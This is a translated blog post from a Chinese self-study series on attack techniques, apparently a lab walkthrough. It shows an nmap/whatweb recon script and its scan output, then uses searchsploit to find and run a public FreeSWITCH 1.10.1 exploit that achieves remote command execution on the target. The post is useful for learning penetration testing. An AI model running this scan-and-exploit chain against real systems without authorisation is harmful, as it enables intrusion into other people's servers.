iT邦幫忙

2024 iThome Ironman Contest (鐵人賽)

DAY 27
Category: 佛心分享-IT 人自學之術 (Generous sharing: self-study for IT people)
Series: 從0到1的攻擊手自學之旅 (An attacker's self-study journey from 0 to 1), part 27

[Ironman Contest] Day 27: Summer training (8) - /FreeSWITCH


SOP

Open PuTTY

  • sudo openvpn --config xxx
  • nmap -p- $rhost
  • nikto -host $rhost
  • dirb $rhost

The above is the SOP I set out in the previous article after working through many target machines. Following it one step at a time turned out to waste too much time, so for every new target I now open at least four terminal tabs and run the categories above in parallel. Even so, having to manually copy the nmap -p- result into the parameters of the next command is dated, so I turned it into an automated sh script to save that whole chunk of work. The code is shared below; before running it you need chmod +x to change its permissions. The script runs in this order: first set $rhost, then nmap -p-; if port 80 is found, run whatweb; finally run nmap -sC -sV -A over every port that was found.

I saved the code below as step1.sh; before the first use, run chmod +x step1.sh to make it executable.

#!/bin/bash

# Check that exactly one argument (the target IP) was provided
if [ "$#" -ne 1 ]; then
    echo "Usage: sudo $0 IP"
    exit 1
fi

# Set the variable rhost to the first argument
rhost="$1"

echo "Starting initial scan on $rhost"

# Initial fast scan to find open ports; reduce the output to a
# comma-separated list such as 135,139,445
open_ports=$(sudo nmap -sS -Pn -T4 -p- --min-rate=1000 "$rhost" | grep '/tcp' | grep -w open | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')

echo "Open ports: $open_ports"

# Check if any ports were found
if [ -z "$open_ports" ]; then
    echo "No open ports found. Exiting."
    exit 1
fi

# Check if port 80 is open. The list is wrapped in commas and matched as
# ",80," so that ports such as 5080 or 8081 are not mistaken for port 80
# (a plain substring test on "80" would match them).
if [[ ",$open_ports," == *",80,"* ]]; then
    echo "Port 80 is open. Running WhatWeb on $rhost"
    whatweb "$rhost"
fi

echo "Starting detailed scan on ports $open_ports"

# Detailed scan (default scripts, version and OS detection) on discovered ports
sudo nmap -sC -sV -A -vv -p "$open_ports" "$rhost"

echo "Detailed scan completed."
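The port-80 check is the part of this script that is easiest to get wrong: in the recorded run later on this page, "Port 80 is open" was printed and whatweb then got "Connection refused", because a substring test for "80" also matches 5080, 8081 and 8082. The script below is an added example (not from the original post) that feeds a constructed nmap -p- output into the same parsing pipeline and compares the substring test with an exact-membership test, so it runs offline without a target:

```shell
#!/bin/sh
# Constructed sample of 'nmap -p-' output (not a real scan). It contains
# ports 5080 and 8081 but NOT port 80, to exercise the edge case.
SAMPLE_NMAP_OUTPUT='Starting Nmap 7.94SVN ( https://nmap.org )
Nmap scan report for 172.16.x.x
PORT      STATE    SERVICE
135/tcp   open     msrpc
445/tcp   open     microsoft-ds
2855/tcp  filtered msrp
5080/tcp  open     sip-proxy
8021/tcp  open     freeswitch-event
8081/tcp  open     websocket'

# Reduce nmap output (on stdin) to a comma-separated list of open TCP ports,
# the same pipeline step1.sh uses; -w keeps "filtered" lines out.
parse_open_ports() {
    grep '/tcp' | grep -w open | cut -d '/' -f 1 | paste -s -d ','
}

# Substring test, equivalent to the bash [[ "$list" =~ "80" ]] check:
# "80" is also found inside 5080 and 8081.  $1 = port list, $2 = port
port_open_substring() {
    case "$1" in *"$2"*) return 0 ;; *) return 1 ;; esac
}

# Exact membership test: wrap both sides in commas so only ",80," matches.
port_open_exact() {
    case ",$1," in *",$2,"*) return 0 ;; *) return 1 ;; esac
}

main() {
    ports=$(printf '%s\n' "$SAMPLE_NMAP_OUTPUT" | parse_open_ports)
    echo "Open ports: $ports"
    if port_open_substring "$ports" 80; then
        echo "substring check: port 80 reported open (false positive)"
    fi
    if port_open_exact "$ports" 80; then
        echo "exact check: port 80 open, run whatweb"
    else
        echo "exact check: port 80 not open, skip whatweb"
    fi
}
main
```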

$rhost

┌──(kali㉿kali)-[~]
└─$ rhost='172.16.x.x'

nmap

┌──(kali㉿kali)-[~]
└─$ nmap -p- $rhost

┌──(kali㉿kali)-[~]
└─$ nmap -p22,80,443 -sC -sV -O $rhost

Bash Shell Script

┌──(kali㉿kali)-[~]
└─$ sudo ./Downloads/step1.sh $rhost
Starting initial scan on 172.16.x.x
Open ports: 135,139,445,2855,2856,3306,5060,5066,5080,5985,7443,8021,8081,8082,47001,49152,49153,49154,49155,49156,49157,49158
Port 80 is open. Running WhatWeb on 172.16.x.x
ERROR Opening: http://172.16.x.x - Connection refused - connect(2) for "172.16.x.x" port 80
Starting detailed scan on ports 135,139,445,2855,2856,3306,5060,5066,5080,5985,7443,8021,8081,8082,47001,49152,49153,49154,49155,49156,49157,49158
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 10:43 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.


PORT      STATE SERVICE          REASON          VERSION
135/tcp   open  msrpc            syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn      syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds     syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
2855/tcp  open  msrp?            syn-ack ttl 127
2856/tcp  open  ssl/cesdinv?     syn-ack ttl 127
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
| Issuer: commonName=FreeSWITCH/countryName=US

3306/tcp  open  mysql?           syn-ack ttl 127
| mysql-info:
|_  MySQL Error: Host '192.168.200.7' is not allowed to connect to this MariaDB server
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, NULL, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
|_    Host '192.168.200.7' is not allowed to connect to this MariaDB server
5060/tcp  open  sip-proxy        syn-ack ttl 127 FreeSWITCH mod_sofia 1.10.1~64bit
|_sip-methods: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY, PUBLISH, SUBSCRIBE
5066/tcp  open  websocket        syn-ack ttl 127 (WebSocket version: 13)
| fingerprint-strings:
|   GenericLines, GetRequest, HTTPOptions:
|     HTTP/1.1 400 Bad Request
|_    Sec-WebSocket-Version: 13
5080/tcp  open  sip-proxy        syn-ack ttl 127 FreeSWITCH mod_sofia 1.10.1~64bit
5985/tcp  open  http             syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7443/tcp  open  ssl/websocket    syn-ack ttl 127 (WebSocket version: 13)

8021/tcp  open  freeswitch-event syn-ack ttl 127 FreeSWITCH mod_event_socket
8081/tcp  open  websocket        syn-ack ttl 127 (WebSocket version: 13)
|_mcafee-epo-agent: ePO Agent not found
| fingerprint-strings:
|   GenericLines, GetRequest, HTTPOptions:
|     HTTP/1.1 400 Bad Request
|_    Sec-WebSocket-Version: 13
8082/tcp  open  ssl/websocket    syn-ack ttl 127 (WebSocket version: 13)
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
|   GenericLines, GetRequest, HTTPOptions:
|     HTTP/1.1 400 Bad Request
|_    Sec-WebSocket-Version: 13
| ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
| Issuer: commonName=FreeSWITCH/countryName=US

47001/tcp open  http             syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc            syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open  msrpc            syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open  msrpc            syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc            syn-ack ttl 127 Microsoft Windows RPC
49156/tcp open  msrpc            syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open  msrpc            syn-ack ttl 127 Microsoft Windows RPC
49158/tcp open  msrpc            syn-ack ttl 127 Microsoft Windows RPC
4 services unrecognized despite returning data. If you know the service/version, please submit the 

Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Detailed scan completed.

5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8021/tcp open freeswitch-event syn-ack ttl 127 FreeSWITCH mod_event_socket

whatweb

┌──(kali㉿kali)-[~]
└─$ whatweb $rhost:5985
http://172.16.x.x:5985 [404 Not Found] Country[RESERVED][ZZ], HTTPServer[Microsoft-HTTPAPI/2.0], IP[172.16.x.x], Microsoft-HTTPAPI[2.0], Title[Not Found]

nikto

┌──(kali㉿kali)-[~]
└─$ nikto -host http://$rhost:5985
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          172.16.x.x
+ Target Hostname:    172.16.x.x
+ Target Port:        5985
+ Start Time:         2024-10-03 10:57:32 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-HTTPAPI/2.0
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/

searchsploit

┌──(kali㉿kali)-[~]
└─$ searchsploit FreeSWITCH
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit)   | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution                      | windows/remote/47799.txt
----------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~]
└─$ searchsploit -m windows/remote/47799.txt
  Exploit: FreeSWITCH 1.10.1 - Command Execution
      URL: https://www.exploit-db.com/exploits/47799
     Path: /usr/share/exploitdb/exploits/windows/remote/47799.txt
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/47799.txt

python

-- Example --
root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami

┌──(kali㉿kali)-[~]
└─$ mv 47799.txt freeswitch-exploit.py

┌──(kali㉿kali)-[~]
└─$ python3 freeswitch-exploit.py $rhost whoami
Authenticated
Content-Type: api/response
Content-Length: 23

win-fh0n2vgindj\offsec

┌──(kali㉿kali)-[~]
└─$ python3 freeswitch-exploit.py $rhost 'cd'
Authenticated
Content-Type: api/response
Content-Length: 28

C:\Program Files\FreeSWITCH

